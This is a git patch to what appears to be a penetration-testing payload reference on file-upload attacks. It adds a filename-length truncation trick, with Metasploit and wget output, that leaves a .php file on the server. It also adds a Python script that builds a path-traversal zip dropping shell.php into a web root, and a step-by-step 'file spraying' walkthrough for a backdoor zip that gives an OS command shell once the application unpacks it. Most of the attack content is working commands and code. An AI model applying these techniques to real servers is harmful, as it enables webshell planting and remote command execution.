From ccd28e314f3626d5a27ab10ae5603202de4da189 Mon Sep 17 00:00:00 2001 From: Mehdi Date: Sun, 27 Aug 2023 16:22:11 +0330 Subject: [PATCH] Update File Upload.md --- File Upload.md | 153 ++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 151 insertions(+), 2 deletions(-) diff --git a/File Upload.md b/File Upload.md index 1b3efc1..8f2fae3 100644 --- a/File Upload.md +++ b/File Upload.md @@ -34,6 +34,7 @@ shell.soap * Perl: `.pl, .pm, .cgi, .lib` * Coldfusion: `.cfm, .cfml, .cfc, .dbm` * Node.js: `.js, .json, .node` +* Erlang Yaws Web Server: `.yaws` ## Upload tricks * Use double extensions : `.jpg.php, .png.php5` @@ -69,6 +70,30 @@ shell.soap * Shell can also be added in the metadata * Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`") +* Try to break the filename limits. The valid extension gets cut off. And the malicious PHP gets left. AAA<--SNIP-->AAA.php +```bash +# Linux maximum 255 bytes +/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 255 +Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4 # minus 4 here and adding .png +# Upload the file and check response how many characters it alllows. Let's say 236 +python -c 'print "A" * 232' +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +# Make the payload +AAA<--SNIP 232 A-->AAA.php.png + +``` + + + + + + + + + + + + ## Filename vulnerabilities Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. @@ -106,7 +131,23 @@ exiftool -Comment=" $(python -c 'print("A"*(236-4)+".php"+".gif")') +python3 -m http.server 9080 + +``` +```bash +#Download the file +wget 127.0.0.1:9080/$(python -c 'print("A"*(236-4)+".php"+".gif")') +The name is too long, 240 chars total. +Trying to shorten... +New name is AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php. +--2020-06-13 03:14:06-- http://127.0.0.1:9080/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php.gif +Connecting to 127.0.0.1:9080... connected. +HTTP request sent, awaiting response... 200 OK +Length: 10 [image/gif] +Saving to: ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ + +AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[===============================================>] 10 --.-KB/s in 0s + +2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10] + +``` +> Note that another option you may be thinking of to bypass this check is to make the HTTP server redirect to a different file, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This won't work unless wget is being used with the parameter --trust-server-names because wget will download the redirected page with the name of the file indicated in the original URL. + + +## python code to create a malicious zip +```python +#!/usr/bin/python +import zipfile +from io import BytesIO + +def create_zip(): + f = BytesIO() + z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED) + z.writestr('../../../../../var/www/html/webserver/shell.php', '') + z.writestr('otherfile.xml', 'Content of the file') + z.close() + zip = open('poc.zip','wb') + zip.write(f.getvalue()) + zip.close() + +create_zip() + +``` + +* To achieve remote command execution I took the following steps: +1. Create a PHP shell: +```php + + +``` + +2. Use “file spraying” and create a compressed zip file: +```bash +root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done +root@s2crew:/tmp# ls *.php +simple-backdoor.php xxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php +xxAcmd.php xxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php +xxAxxAcmd.php xxAxxAxxAxxAxxAcmd.php xxAxxAxxAxxAxxAxxAxxAxxAcmd.php +root@s2crew:/tmp# zip cmd.zip xx*.php + adding: xxAcmd.php (deflated 40%) + adding: xxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) + adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%) +root@s2crew:/tmp# + +``` +3. Use a hexeditor or vi and change the “xxA” to “../”, I used vi: +```bash +:set modifiable +:%s/xxA/..\//g +:x! + +``` +Done! + +Only one step remained: Upload the ZIP file and let the application decompress it! If it is succeeds and the web server has sufficient privileges to write the directories there will be a simple OS command execution shell on the system. + + + + +## Here’s a top 10 list of things that you can achieve by uploading (from [link](https://twitter.com/SalahHasoneh1/status/1281274120395685889)): +1. **ASP / ASPX / PHP5 / PHP / PHP3:** Webshell / RCE +2. **SVG:** Stored XSS / SSRF / XXE +3. **GIF:** Stored XSS / SSRF +4. **CSV:** CSV injection +5. **XML:** XXE +6. **AVI:** LFI / SSRF +7. **HTML / JS:** HTML injection / XSS / Open redirect +8. **PNG / JPEG:** Pixel flood attack (DoS) +9. **ZIP:** RCE via LFI / DoS +10. **PDF / PPTX:** SSRF / BLIND XXE ## Tools * [Fuxploider](https://github.com/almandin/fuxploider) -* [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) +* [Burp > Upload Scanner](https://portswigger.net/bappstore/b2244cbb6953442cb3c82fa0a0d908fa) and [github-portswigger](https://github.com/portswigger/upload-scanner) * [ZAP > FileUpload AddOn](https://www.zaproxy.org/blog/2021-08-20-zap-fileupload-addon/)